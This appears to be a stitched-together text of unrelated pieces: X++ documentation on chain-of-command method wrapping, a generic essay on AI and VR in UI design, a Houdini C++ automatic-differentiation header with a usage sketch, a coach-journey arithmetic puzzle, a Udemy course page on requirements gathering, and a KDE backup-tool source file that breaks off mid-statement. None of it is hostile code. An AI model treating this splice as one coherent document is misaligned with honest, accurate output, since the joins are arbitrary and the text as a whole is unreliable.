Methods that have default parameters can be wrapped by extension classes. However, the method signature in the wrapper method must not include the default value of the parameter. For example, the following simple class has a method that has a default parameter.

class Person
{
    public void salute(str message = "Hi")
    {
    }
}

In this case, the wrapper method must resemble the following example.

[ExtensionOf(classStr(Person))]
final class aPerson_Extension
{
    public void salute(str message)
    {
    }
}

In the aPerson_Extension extension class, notice that the salute method doesn't include the default value of the message parameter.

Wrapping instance and static methods

Instance and static methods can be wrapped by extension classes. If a static method is the target that will be wrapped, the method in the extension must be qualified by using the static keyword. For example, we have the following A class.

class A
{
    public static void aStaticMethod(int parameter1)
    {
        // ...
    }
}

In this case, the wrapper method must resemble the following example.

[ExtensionOf(classStr(A))]
final class An_Extension
{
    public static void aStaticMethod(int parameter1)
    {
        next aStaticMethod(10);
    }
}

Important: The ability to wrap static methods doesn't apply to forms. In X++, a form class isn't a new class, and it can't be instantiated or referenced as a normal class. Static methods in forms don't have any semantics.

Wrapper methods must always call next

Wrapper methods in an extension class must always call next, so that the next method in the chain and, finally, the original implementation are always called. This restriction helps guarantee that every method in the chain contributes to the result. In the current implementation of this restriction, the call to next must be in the first-level statements in the method body.

Here are some important rules:

- Calls to next can't be done conditionally inside an if statement.
- Calls to next can't be done in while, do-while, or for loop statements.
- A next statement can't be preceded by a return statement.
- Because logical expressions are optimized, calls to next can't occur in logical expressions. At runtime, the execution of the complete expression isn't guaranteed.

Note: The author of the original implementation of a method can explicitly allow wrapper methods to skip calling next. If the method you are wrapping is tagged with the [Replaceable] attribute, an extension class can wrap this method without calling the next keyword. Replaceable methods are methods that implement logic that can safely be "replaced" by a custom implementation. This functionality is available with the release of Platform update 11.

Wrapping a base method in an extension of a derived class

The following example shows how to wrap a base method in an extension of a derived class. For this example, the following class hierarchy is used.

class A
{
    public void salute(str message)
    {
        Info(message);
    }
}

class B extends A
{
}

class C extends A
{
}

Therefore, there is one base class, A. Two classes, B and C, are derived from A. We will augment or create an extension class of one of the derived classes (in this case, B), as shown here.

[ExtensionOf(classStr(B))]
final class aB_Extension
{
    public void salute(str message)
    {
        next salute(message);
        Info("B extension");
    }
}

Although the aB_Extension class is an extension of B, and B doesn't have a method definition for the salute method, you can wrap the salute method that is defined in the base class, A. Therefore, only instances of the B class will include the wrapping of the salute method. Instances of the A and C classes will never call the wrapper method that is defined in the extension of the B class. This behavior becomes clearer if we implement a method that uses these three classes.

class ProgramTest
{
    public static void main(Args _args)
    {
        var a = new A();
        var b = new B();
        var c = new C();

        a.salute("Hi");
        b.salute("Hi");
        c.salute("Hi");
    }
}

For calls to a.salute("Hi") and c.salute("Hi"), the Infolog shows only the message "Hi." However, when b.salute("Hi") is called, the Infolog shows "Hi" followed by "B extension." By using this mechanism, you can wrap the original method only for specific derived classes.

Accessing protected members from extension classes

As of Platform update 9, you can access protected members from extension classes. These protected members include fields and methods. Note that this support isn't specific to wrapping methods but applies to all the methods in the class extension. Therefore, class extensions are more powerful than they were before.

The Hookable attribute

If a method is explicitly marked as [Hookable(false)], the method can't be wrapped in an extension class. In the following example, anyMethod can't be wrapped in a class that augments anyClass1.

class anyClass1
{
    [HookableAttribute(false)]
    public void anyMethod() {…}
}

Final methods and the Wrappable attribute

Public and protected methods that are marked as final can't be wrapped in extension classes. You can override this restriction by using the Wrappable attribute and setting the attribute parameter to true ([Wrappable(true)]). Similarly, to override the default capability for (non-final) public or protected methods, you can mark those methods as non-wrappable ([Wrappable(false)]).

In the following example, the doSomething method is explicitly marked as non-wrappable, even though it's a public method. The doSomethingElse method is explicitly marked as wrappable, even though it's a final method.

class anyClass2
{
    [Wrappable(false)]
    public void doSomething(str message) {…}

    [Wrappable(true)]
    final public void doSomethingElse(str message) {…}
}

Extensions of form-nested concepts such as data sources, data fields, and controls

In order to implement CoC methods for form-nested concepts, such as data sources, data fields, and controls, an extension class is required for each nested concept.

Form data sources

In this example, FormToExtend is the form, DataSource1 is a valid existing data source in the form, and init and validateWrite are methods that can be wrapped in the data source.

[ExtensionOf(formdatasourcestr(FormToExtend, DataSource1))]
final class FormDataSource1_Extension
{
    public void init()
    {
        next init();
        //...
    }

    public boolean validateWrite()
    {
        boolean ret;
        //...
        ret = next validateWrite();
        //...
        return ret;
    }
}

Form data fields

In this example, a data field is extended. FormToExtend is the form, DataSource1 is a data source in the form, Field1 is a field in the data source, and validate is one of many methods that can be wrapped in this nested concept.

[ExtensionOf(formdatafieldstr(FormToExtend, DataSource1, Field1))]
final class FormDataField1_Extension
{
    public boolean validate()
    {
        boolean ret;
        //...
        ret = next validate();
        //...
        return ret;
    }
}

Controls

In this example, FormToExtend is the form, Button1 is the button control in the form, and clicked is a method that can be wrapped on the button control.

[ExtensionOf(formcontrolstr(FormToExtend, Button1))]
final class FormButton1_Extension
{
    public void clicked()
    {
        next clicked();
        //...
    }
}

Requirements and considerations when you write CoC methods on extensions for form-nested concepts

- Like other CoC methods, these methods must always call next to invoke the next method in the chain, so that the chain can go all the way to the kernel or native implementation in the runtime behavior. The call to next is equivalent to a call to super() from the form itself, to help guarantee that the base behavior in the runtime is always run as expected.
- Currently, the X++ editor in Microsoft Visual Studio doesn't support discovery of methods that can be wrapped. Therefore, you must refer to the system documentation for each nested concept to identify the correct method to wrap and its exact signature.
- You cannot add CoC to wrap methods that aren't defined in the original base behavior of the nested control type. For example, you can't add CoC for methodInButton1 on an extension. However, from the control extension, you can make a call into this method if the method has been defined as public or protected. Here is an example where the Button1 control is defined in the FormToExtend form in such a way that it has the methodInButton1 method.

[Form]
public class FormToExtend extends FormRun
{
    [Control("Button")]
    class Button1
    {
        public void methodInButton1(str param1)
        {
            Info("Hi from methodInButton1");
            //...
        }
    }
}

- You do not have to recompile the module where the original form is defined to support CoC methods on nested concepts on that form from an extension. For example, if the FormToExtend form from the previous examples is in the ApplicationSuite module, you don't have to recompile ApplicationSuite to extend it with CoC for nested concepts on that form from a different module.

Restrictions on wrapper methods

The following sections describe restrictions on the use of CoC and method wrapping.

Kernel methods can't be wrapped

Kernel classes aren't X++ classes. Instead, they are classes that are defined in the kernel of the Microsoft Dynamics 365 Unified Operations platform. Even though extension classes are supported for kernel classes, method wrapping isn't supported for methods of kernel classes. In other words, if you want to wrap a method, the base method must be an X++ method.

X++ classes that are compiled by using Platform update 8 or earlier

The method wrapping feature requires specific functionality that is emitted by an X++ compiler that is part of Platform update 9 or later. Methods that are compiled by using earlier versions don't have the infrastructure to support this feature.

Nested class methods in forms can be wrapped in Platform update 16 or later

The ability to wrap methods in nested classes by using class extensions was added in Platform update 16. The concept of nested classes in X++ applies to forms for overriding data source methods and form control methods.

Tooling

For the features that are described in this topic, the Microsoft Visual Studio X++ editor doesn't yet offer complete support for cross-references and Microsoft IntelliSense. We plan to make complete support available in Dynamics 365 for Finance and Operations Platform update 10.
The future of UI design and emerging technologies

The future of UI design is an exciting topic to explore as new technologies and design principles continue to emerge and shape how we create user interfaces. One of the most exciting developments in UI design is the growing focus on emerging technologies such as artificial intelligence, machine learning, and virtual and augmented reality.

Artificial intelligence (AI) and machine learning are rapidly advancing technologies

Artificial intelligence (AI) and machine learning are rapidly advancing technologies that are starting to play a more significant role in the field of UI design. By leveraging these technologies, UI designers can create more intuitive and user-friendly interfaces for websites and applications.

One way that AI and machine learning are used in UI design is through chatbots. These AI-powered chatbots can interact with users naturally and intuitively, providing answers to frequently asked questions or directing users to the right page on a website. This helps improve the overall user experience, as users can find the information they need more quickly and easily.

In addition to providing a better user experience, AI-powered chatbots can also help to free up human customer service representatives to handle more complex tasks. By handling simple tasks such as answering frequently asked questions, chatbots allow customer service representatives to focus on providing more personalized and in-depth support to customers who need it.

Overall, the use of AI and machine learning in UI design is a trend that will only continue to grow. By leveraging these technologies, UI designers can create user interfaces that are more intuitive, user-friendly, and efficient than ever before.

[Image: A futuristic humanoid pointing towards the future in a cyberpunk style]

Virtual and augmented reality are emerging technologies that are starting to impact the world of UI design. These technologies have the potential to create truly immersive and interactive user experiences, allowing users to interact with digital content more naturally and intuitively.

Interactive product displays

One way that virtual and augmented reality are used in UI design is in creating interactive product displays. Using augmented reality, users can see how a product would look in their home, giving them a better idea of whether it would fit in with their existing decor. This helps improve the customer experience, as users can get a better sense of what they are buying before they make a purchase.

Another way that virtual and augmented reality are being used in UI design is in the development of training simulations. These simulations allow users to practice complex tasks in a safe and controlled environment, helping them learn and improve their skills without making costly mistakes. This can be particularly useful for industries such as healthcare, where training simulations can help prepare professionals for real-world situations.

Overall, the use of virtual and augmented reality in UI design is a trend that will only continue to grow. By leveraging these technologies, UI designers can create user interfaces that are more immersive, interactive, and engaging than ever before.

[Image: A futuristic city with skyscrapers in a cyberpunk style]

As AI, machine learning, and virtual and augmented reality continue to evolve and advance, they will undoubtedly have a significant impact on the future of UI design. These emerging technologies have the potential to create user interfaces that are more intuitive, engaging, and user-friendly than ever before.

To take full advantage of these technologies, UI designers must stay up to date on the latest trends and developments. This involves staying on top of the latest research and best practices in the field and experimenting with new technologies and design principles. By embracing these emerging technologies and staying ahead of the curve, UI designers can create user interfaces that are truly cutting-edge and innovative.

In addition to staying up to date on the latest trends, UI designers must also be willing to experiment and take risks. As with any field, there will be failures and setbacks along the way, but by being willing to try new things and push the boundaries of what is possible, UI designers can create truly groundbreaking user interfaces unlike anything that has come before.

Overall, the future of UI design is bright and exciting, with countless opportunities for innovation and creativity. By embracing emerging technologies and staying up to date on the latest trends, UI designers can create user interfaces that are more intuitive, engaging, and user-friendly than ever before.
SIM_DerVector3.h

/*
 * PROPRIETARY INFORMATION. This software is proprietary to
 * Side Effects Software Inc., and is not to be reproduced,
 * transmitted, or disclosed in any way without written permission.
 *
 */

#ifndef __SIM_DerVector3_h__
#define __SIM_DerVector3_h__

#include "SIM_API.h"
#include <UT/UT_Matrix3.h>
#include <UT/UT_Vector3.h>

class SIM_DerScalar;

/// This class defines a 3D vector and its partial derivative w.r.t. another
/// 3D vector. It uses automatic differentiation to maintain the dependency
/// upon the derivative vector as arithmetic operations are performed.
/// The derivative of a vector-valued function is, of course, a Jacobian
/// matrix.
///
/// By performing a sequence of arithmetic operations on this
/// vector class after initializing its derivative appropriately, you can
/// easily keep track of the effect of those operations on the derivative.
/// Independent variables can be included in an equation using the
/// conventional UT_Vector3 and fpreal types, and dependent variables can
/// use the SIM_DerVector3 and SIM_DerScalar types.
///
/// It is inspired by Eitan Grinspun's class for the same purpose,
/// described in his 2003 SCA paper on Discrete Shells.
class SIM_API SIM_DerVector3
{
public:
    SIM_DerVector3() { }
    /// Initialize to a constant vector, with no derivative.
    explicit SIM_DerVector3(const UT_Vector3 &v) : myV(v), myD(0.f)
    { }
    /// Initialize to a vector with a derivative. This is particularly
    /// useful for initializing the variables themselves, where D=I.
    SIM_DerVector3(const UT_Vector3 &v,
                   const UT_Matrix3 &D) : myV(v), myD(D)
    { }

    // Default copy constructor is fine.
    //SIM_DerVector3(const SIM_DerVector3 &rhs);

    /// The vector v.
    const UT_Vector3 &v() const
    { return myV; }

    /// Derivative matrix, dv/dx.
    /// The entries of the matrix are laid out like a typical Jacobian:
    ///
    ///   [ dv1/dx1 dv1/dx2 dv1/dx3 ]
    ///   [ dv2/dx1 dv2/dx2 dv2/dx3 ]
    ///   [ dv3/dx1 dv3/dx2 dv3/dx3 ]
    ///
    ///   [ dv1/dx ]
    /// = [ dv2/dx ]
    ///   [ dv3/dx ]
    ///
    /// = [ dv/dx1 dv/dx2 dv/dx3 ]
    const UT_Matrix3 &D() const
    { return myD; }

    // Default assignment operator is fine.
    // SIM_DerVector3 operator=(const SIM_DerVector3 &rhs);

    SIM_DerVector3 operator-() const
    {
        return SIM_DerVector3(-v(), -D());
    }
    SIM_DerVector3 operator+(const SIM_DerVector3 &rhs) const
    {
        // d(v1+v2)/dx = dv1/dx + dv2/dx
        return SIM_DerVector3(v() + rhs.v(), D() + rhs.D());
    }
    SIM_DerVector3 operator+(const UT_Vector3 &rhs) const
    {
        return SIM_DerVector3(v() + rhs, D());
    }
    SIM_DerVector3 operator-(const SIM_DerVector3 &rhs) const
    {
        // d(v1-v2)/dx = dv1/dx - dv2/dx
        return SIM_DerVector3(v() - rhs.v(), D() - rhs.D());
    }
    SIM_DerVector3 operator-(const UT_Vector3 &rhs) const
    {
        return SIM_DerVector3(v() - rhs, D());
    }
    SIM_DerVector3 operator*(const SIM_DerScalar &rhs) const;
    SIM_DerVector3 operator*(fpreal scalar) const
    {
        // d(v*s)/dx = s*dv/dx + v * (ds/dx)^T
        return SIM_DerVector3(v() * scalar, D() * scalar);
    }
    SIM_DerVector3 &operator+=(const SIM_DerVector3 &rhs)
    { return operator=((*this) + rhs); }
    SIM_DerVector3 &operator+=(const UT_Vector3 &rhs)
    { return operator=((*this) + rhs); }
    SIM_DerVector3 &operator-=(const SIM_DerVector3 &rhs)
    { return operator=((*this) - rhs); }
    SIM_DerVector3 &operator-=(const UT_Vector3 &rhs)
    { return operator=((*this) - rhs); }
    SIM_DerVector3 &operator*=(const SIM_DerScalar &rhs)
    { return operator=((*this) * rhs); }
    SIM_DerVector3 &operator*=(const fpreal rhs)
    { return operator=((*this) * rhs); }

    SIM_DerScalar dot(const SIM_DerVector3 &rhs) const;
    SIM_DerScalar dot(const UT_Vector3 &rhs) const;
    SIM_DerVector3 cross(const SIM_DerVector3 &rhs) const;
    SIM_DerVector3 cross(const UT_Vector3 &rhs) const;
    SIM_DerScalar length2() const;
    SIM_DerScalar length() const;
    SIM_DerVector3 normalize() const;

    // Matrix corresponding to a vector cross-product.
    //   a x b = S(a) * b
    // The matrix is skew-symmetric.
    static UT_Matrix3 S(const UT_Vector3 &v)
    {
        return UT_Matrix3(     0, -v.z(),  v.y(),
                           v.z(),      0, -v.x(),
                          -v.y(),  v.x(),      0);
    }

private:
    UT_Vector3 myV;
    UT_Matrix3 myD;
};

#include "SIM_DerScalar.h"

inline
SIM_DerVector3 operator+(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs);
inline
SIM_DerVector3 operator-(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs);
inline
SIM_DerVector3 operator*(const SIM_DerScalar &s, const SIM_DerVector3 &v);
inline
SIM_DerVector3 operator*(fpreal s, const SIM_DerVector3 &v);
inline
SIM_DerVector3 operator/(const SIM_DerVector3 &v, const SIM_DerScalar &s);
inline
SIM_DerVector3 operator/(const SIM_DerVector3 &v, fpreal s);
inline
SIM_DerScalar dot(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs);
inline
SIM_DerScalar dot(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs);
inline
SIM_DerScalar dot(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs);
inline
SIM_DerVector3 cross(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs);
inline
SIM_DerVector3 cross(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs);
inline
SIM_DerVector3 cross(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs);


inline SIM_DerVector3
SIM_DerVector3::operator*(const SIM_DerScalar &rhs) const
{
    // d(v*s)/dx = s*dv/dx + v * (ds/dx)^T
    UT_Matrix3 newD(D());
    newD *= rhs.v();
    newD.outerproductUpdate(1, v(), rhs.D());

    return SIM_DerVector3(v() * rhs.v(), newD);
}

inline SIM_DerScalar
SIM_DerVector3::dot(const SIM_DerVector3 &rhs) const
{
    // d(v1.v2)/dx = v1^T * dv2/dx + v2^T * dv1/dx
    // Note the rowvector*matrix multiplication.
    return SIM_DerScalar(::dot(v(), rhs.v()),
                         ::rowVecMult(rhs.v(), D()) +
                         ::rowVecMult(v(), rhs.D()));
}

inline SIM_DerScalar
SIM_DerVector3::dot(const UT_Vector3 &rhs) const
{
    return SIM_DerScalar(::dot(v(), rhs),
                         ::rowVecMult(rhs, D()));
}

// d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx
//              = -v2 x dv1/dx + v1 x dv2/dx
//              = S(-v2) dv1/dx + S(v1) dv2/dx
inline SIM_DerVector3
SIM_DerVector3::cross(const SIM_DerVector3 &rhs) const
{
    return SIM_DerVector3(::cross(v(), rhs.v()),
                          S(-rhs.v()) * D() + S(v()) * rhs.D());
}

// d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx
//              = -v2 x dv1/dx + v1 x dv2/dx
//              = S(-v2) dv1/dx + S(v1) dv2/dx
inline SIM_DerVector3
SIM_DerVector3::cross(const UT_Vector3 &rhs) const
{
    return SIM_DerVector3(::cross(v(), rhs), S(-rhs) * D());
}

// d|v|^2/dx = d|v.v|/dx
//           = 2 * v * dv/dx
inline SIM_DerScalar
SIM_DerVector3::length2() const
{
    return SIM_DerScalar(v().length2(),
                         2 * ::rowVecMult(v(), D()));
}

// d|v|/dx = d((v.v)^.5)/dx
//         = .5 / |v| * d(v.v)/dx
//         = v / |v| * dv/dx

// Because it includes a square root, there is a discontinuity at the
// origin. Like the square root, I approximate using a zero derivative at
// the origin.
inline SIM_DerScalar
SIM_DerVector3::length() const
{
    const fpreal tol = 1e-5;
    const fpreal len = v().length();
    if( len < tol )
        return SIM_DerScalar(len);
    else
        return SIM_DerScalar(len, ::rowVecMult(v() / len, D()));
}

inline SIM_DerVector3
SIM_DerVector3::normalize() const
{
    // TODO: we can make this more efficient... can't we?
    return (*this)/length();
}


inline SIM_DerVector3
operator+(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs)
{
    return rhs + lhs;
}

inline SIM_DerVector3
operator-(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs)
{
    return SIM_DerVector3(lhs - rhs.v(), -rhs.D());
}

inline SIM_DerVector3
operator*(const SIM_DerScalar &s, const SIM_DerVector3 &v)
{
    return v * s;
}

inline SIM_DerVector3
operator*(fpreal s, const SIM_DerVector3 &v)
{
    return v * s;
}

inline SIM_DerVector3
operator/(const SIM_DerVector3 &v, const SIM_DerScalar &s)
{
    return v * s.inverse();
}

inline SIM_DerVector3
operator/(const SIM_DerVector3 &v, fpreal s)
{
    return v * (1/s);
}

inline SIM_DerScalar
dot(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs)
{
    return lhs.dot(rhs);
}

inline SIM_DerScalar
dot(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs)
{
    return lhs.dot(rhs);
}

inline SIM_DerScalar
dot(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs)
{
    return rhs.dot(lhs);
}

inline SIM_DerVector3
cross(const SIM_DerVector3 &lhs, const SIM_DerVector3 &rhs)
{
    return lhs.cross(rhs);
}

inline SIM_DerVector3
cross(const SIM_DerVector3 &lhs, const UT_Vector3 &rhs)
{
    return lhs.cross(rhs);
}

inline SIM_DerVector3
cross(const UT_Vector3 &lhs, const SIM_DerVector3 &rhs)
{
    // d(v1 x v2)/dx = dv1/dx x v2 + v1 x dv2/dx
    //              = -v2 x dv1/dx + v1 x dv2/dx
    //              = S(-v2) dv1/dx + S(v1) dv2/dx
    return SIM_DerVector3(::cross(lhs, rhs.v()),
                          SIM_DerVector3::S(lhs) * rhs.D());
}
#endif
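A minimal usage sketch follows. It is not part of the header above; it assumes an HDK build environment with the headers shown, and the function name exampleDerivative is invented for illustration. The idea is to seed the independent variable with an identity derivative (D=I, as the doc comment suggests), then let the overloaded operators carry the Jacobian through the computation.

#include <UT/UT_Matrix3.h>
#include <UT/UT_Vector3.h>
#include "SIM_DerVector3.h"

void exampleDerivative()
{
    // The independent variable x: its derivative w.r.t. itself is I.
    const UT_Matrix3 identity(1, 0, 0,
                              0, 1, 0,
                              0, 0, 1);
    SIM_DerVector3 x(UT_Vector3(1.0f, 2.0f, 3.0f), identity);

    // A plain constant participates with no derivative of its own.
    UT_Vector3 c(0.0f, 1.0f, 0.0f);

    // f(x) = (x . c) * x: f.v() is the value, f.D() the 3x3 Jacobian df/dx.
    SIM_DerVector3 f = x * x.dot(c);

    // |x| as a SIM_DerScalar, carrying its row-vector derivative.
    SIM_DerScalar len = x.length();
}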
Week 241 (25 March 2022)

Theo is going home for the weekend to visit his Mum for Mothering Sunday. He is travelling from London to Cardiff by coach. The distance by road from London to Cardiff is 140 miles and the coach is leaving London at 1:30pm. He assumes the coach will travel at an average speed of 50mph.

Can you use Theo's assumptions to work out his arrival time in Cardiff?

Answer:
Time taken = Distance ÷ Speed = 140 ÷ 50 = 2.8 hrs
2.8 hrs = 2 hrs 48 mins (0.8 × 60 = 48 mins)
Arrival time = 1:30pm + 2 hrs 48 mins = 4:18pm
4.25 out of 5 (2,591 reviews on Udemy)

Software Development: Better Requirements Gathering Skills

Boost Your Software Requirements Gathering Skills Today! Learn The Techniques That Work!

Identify the correct questions to ask during requirements gathering
Effectively manage the requirements gathering process
Handle 'Single Interviews', 'Group Interviews' and 'Focus Groups'
Anticipate 'problem areas' and how to deal with them
Differentiate 'Functional Requirements' from 'Non-Functional Requirements'
How to design software for multiple departments
Manage the customer's expectations from day one
Choose the right path to delivering software on time and on budget
Avoid project overrun by clearly defining what is in scope and what is not!
Complete the accompanying template files
Free 'Software Requirements Specification' template
Free 'Feasibility Guide' template

Whether you are a software developer, architect, project manager or just someone who codes for fun, knowing what to write is just as hard as knowing how to write it.

'Software requirements gathering' is the process of capturing the objectives, goals and wishes of the customer upfront and early on in the Software Development Life Cycle (SDLC).

This course is accompanied by several templates and document files that you can use as a guideline during your next requirements gathering project. There is a feasibility study template, a software specification template, a terminology guide and a couple more.

This course will get you asking the right questions early in the process, saving you time, money and effort. You will learn how to manage the requirements process from start to finish, how to differentiate between functional and non-functional requirements, and how to capture and record requirements. Plus, you will get an insight into how one system is used throughout an organization.

This course will guide you through the entire range of scoping documents, technical specifications, feasibility studies and requirements gathering.

Your time is precious and that matters to me, so this course has been arranged into small lectures that you can consume when you have a spare few minutes. They follow on from each other, making the entire course watchable in one sitting. By applying these techniques, you can be sure that the project you embark on is the same as the project you deliver: on time and on budget.

Capturing software requirements, meeting deliverables, exceeding expectations and documenting the whole process can take years to learn; this stuff is not taught in colleges, it is learned in the trenches. So save yourself time and get the insider information on the topics that matter.

By the end of the course, you will have amassed a large number of key takeaways and several useful template files that together will take your software development skills to the next level.

This course is for life, meaning you can learn whenever you have the time. You have access to the discussions area, where I will personally answer any questions you have on this course. This course is also backed by a 30-day money-back guarantee.

If you need a deeper understanding of the software development life cycle, are about to begin work on a new software project, or are embarking on a prospective customer collaboration, this course will guide you through the process.

I look forward to seeing you on the inside.

Kind regards,
Robin.

Introduction

1 Introduction
This lecture will describe the course, its materials and the logical structure. Students will understand the scope of the entire course and how to access the resources.

2 What Are Software Requirements?
Students will learn why requirements are needed, how they can manage expectations, how requirements can mitigate potentially heated discussions, and how requirements describe specific, measurable features as clearly as possible.

3 Requirement Types
Students will learn how to identify the different types of requirements, understand how requirements address big issues like scope, understanding and stability, and learn the differences between functional and non-functional requirements.

Building An Effective Skillset

1 Feasibility Study
Students will learn how to determine whether a project is feasible before embarking on expensive work, and how to factor in human resourcing and expected product lifetime. Plus, you will learn the output from the feasibility study and what it is used for.

2 Feasibility Quiz

3 Gathering Requirements
After completing this lecture, students will be able to effectively justify the need for a feasibility report and employ 4 different techniques for eliciting requirements from customers.

4 Requirements Gathering - Getting Started
In this lecture you will learn how to focus on the right people, collect the correct information, validate the need and establish benchmarks. You will see the 5 phases that you must go through to gather requirements and ensure that consideration is given to the priority tasks.

5 Standard Operating Documents
After completing this lecture, you will be able to identify the value of existing 'SOP docs', you will learn how it can be necessary to look to the past before moving forwards, and finally, you will learn why some requirements are constrained by the client.

6 Asking The Right Questions
After completing this lecture you will have the ability to ask the right questions and know why wrong questions can sometimes be useful. You will also learn how to re-phrase a question to elicit better responses from your clients, along with my Power-Question, which never fails to coax out the best details needed when gathering requirements.

7 Managing Requirements
After completing this lecture you will be able to identify both bad and good requirements, and you will learn how to employ 5 techniques for converting bad into good. Plus, you will learn a few ways of thinking about the requirements gathering process designed to save you time and effort.

8 Understanding Interactions
After completing this lecture you will be able to understand the interactions between different departments within an organization, and you will be able to identify the role that mediation plays in the requirements gathering process. Plus, you will be able to avoid conflicting statements by understanding information flow.

9 Interactions Quiz

10 Typical Architectures
In this lecture you will learn how to perceive a system as a tiered architecture, and how adopting a 'pluggable' approach to software design makes it easy to capture requirements and think in a modular manner.

11 Requirements Specification
After completing this lecture you will be able to value 'language-neutrality', understand where the SRS document fits within the SDLC, and see why ambiguity is the biggest cause of confusion when gathering software requirements.

12 Requirements Validation
After completing this lecture, you will be able to justify the validation process and remove ambiguity from the problem domain. You will learn the 4 steps to validating requirements. Plus, you will learn how to think 'smart' to manage your requirements gathering process to be as productive as it can be.

13 Document Structures
After completing this lecture you will have a firm grasp on what needs to be included in a requirements specification. You will learn why both people and problems need to be described. If you have not done so already, you should go download the template for this course from the resources section at the start of this course.

Conclusion and Take-aways

1 Conclusion
This lecture contains a summary of the main topics covered in this course together with a few useful takeaway notes.

2 Feedback
If you have any questions, then please do not hesitate to ask in the discussion area. I humbly ask that if you enjoyed this course, you consider leaving a review so that future students can see if this course appeals to them. Finally, thank you for taking the time to complete this course.

Rating: 4.3 out of 5 (2,591 ratings). Detailed rating: 5 stars: 729, 4 stars: 1,204, 3 stars: 556, 2 stars: 76, 1 star: 26.

30-Day Money-Back Guarantee. Includes: 1 hour of on-demand video, full lifetime access, access on mobile and TV, certificate of completion.
Keep – backup system

keep/keep/app/keepmainwindow.cpp

/*
 This file is part of the Keep project

 Copyright (C) 2005 Jean-Rémy Falleri <[email protected]>

 Keep is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 Keep is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.

 You should have received a copy of the GNU General Public License
 along with Keep; if not, write to the Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/

#include "keepmainwindow.h"

#include <tqcolor.h>
#include <tqlayout.h>
#include <tqvariant.h>

#include <dcopclient.h>
#include <kactioncollection.h>
#include <kstdaction.h>
#include <kdebug.h>
#include <klocale.h>
#include <kactivelabel.h>
#include <kapp.h>
#include <kled.h>
#include <kpushbutton.h>
#include <kmessagebox.h>
#include <kiconloader.h>
#include <kconfigdialog.h>

#include "backupconfig.h"
#include "addbackupwizard.h"
#include "restorebackupwizard.h"
#include "forcebackupdialog.h"
#include "backupconfigdialog.h"
#include "generalconfigview.h"
#include "rdbmanager.h"
#include "keepsettings.h"
#include "logdialog.h"

KeepMainWindow::KeepMainWindow(TQWidget *parent, const char *name): KMainWindow(parent,name)
{
    setCaption(i18n("Backup System"));

    m_actionView = new ActionView(this);

    KIconLoader *icons = TDEGlobal::iconLoader();
    m_actionView->m_btnAddWizard->setPixmap(icons->loadIcon("add_backup",KIcon::Toolbar,32));
    m_actionView->m_btnRestoreWizard->setPixmap(icons->loadIcon("restore_dir",KIcon::Toolbar,32));
    m_actionView->m_btnForce->setPixmap(icons->loadIcon("force_backup",KIcon::Toolbar,32));
    m_actionView->m_btnBackupConfig->setPixmap(icons->loadIcon("configure",KIcon::Toolbar,32));
    m_actionView->m_btnLog->setPixmap(icons->loadIcon("log",KIcon::Toolbar,32));

    slotRefreshGUI();

    setCentralWidget(m_actionView);

    initActions();
    initConnections();

    resize( minimumSizeHint() );

    createGUI(0L);

    RDBManager manager;
    if ( !manager.isRDB() )
        slotCheckRDB();
}

KeepMainWindow::~KeepMainWindow()
{
}

void KeepMainWindow::initActions()
{
    KStdAction::quit(TQT_TQOBJECT(this), TQT_SLOT(close()), actionCollection());

    new KAction( i18n("Check rdiff-backup"), "info", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotCheckRDB()), actionCollection(), "check_rdiff-backup" );
    new KAction( i18n("Configure backups"), "configure", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotConfigureBackup()), actionCollection(), "configure_backups" );
    new KAction( i18n("Configure"), "configure", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotConfigure()), actionCollection(), "configure_keep" );
    new KAction( i18n("Add Backup"), "add_backup", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotAddBackupWizard()), actionCollection(), "add_backup" );
    new KAction( i18n("Restore Backup"), "restore_dir", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotRestoreBackupWizard()), actionCollection(), "restore_backup" );
    new KAction( i18n("Backup Now"), "force_backup", "", TQT_TQOBJECT(this),
        TQT_SLOT(slotForceBackup()), actionCollection(), "force_backup" );
    new KAction( i18n("View log"), "log", "", TQT_TQOBJECT(this),
